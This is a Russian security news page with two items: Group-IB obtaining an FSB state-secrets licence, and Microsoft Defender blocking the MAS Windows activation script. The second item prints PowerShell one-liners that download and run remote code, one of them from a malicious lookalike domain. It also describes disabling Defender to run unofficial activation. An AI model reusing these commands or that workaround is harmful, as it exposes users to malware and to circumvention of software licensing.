Group-IB получила лицензию ФСБ РФ на работу со сведениями, составляющими государственную тайну

Group-IB получила лицензию ФСБ РФ на работу с гостайной

Group-IB получила лицензию ФСБ РФ на работу с гостайной

Компания Group-IB стала обладателем лицензии Федеральной службы безопасности России, которая дает право на осуществление работ с использованием сведений, составляющих государственную тайну. Соответствующую лицензию (ГТ № 0064472, регистрационный номер 4490) компании выдало Управление ФСБ РФ по г. Москве и Московской области сроком на три года.

Условием для реализации данного вида деятельности является соблюдение требований законодательных и иных нормативных актов РФ по обеспечению защиты подобных сведений.

Необходимость получения лицензии связана с активной работой Group-IB в части проведения компьютерно-технических экспертиз и работ по аудиту информационной безопасности не только с коммерческими, но и государственными структурами, деятельность которых предполагает использование информации, содержащей государственную тайну.

«Компания Group-IB обладает широким спектром услуг не только в области компьютерной криминалистики, но и защиты информации различной степени секретности. Сведения, составляющие государственную тайну, не являются исключением. В настоящий момент специалистами компании осуществляется несколько проектов по аудиту информационной безопасности в ряде министерств и ведомств РФ, что несомненно требует выполнения требований регулятора при работе со сведениями ограниченного доступа.» — комментирует Илья Сачков, генеральный директор компании Group-IB.

На сегодняшний день в Group-IB создано специализированное подразделение, обеспечивающее соответствие организации работы и всех ее этапов требованиям, установленным регламентирующими документами.

Получение лицензии позволит вывести на новый уровень работу компании Group-IB по защите информации и анализу защищенности автоматизированных и информационных систем федерального уровня, министерств и ведомств, критически важных объектов и предприятий оборонно-промышленного комплекса РФ.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru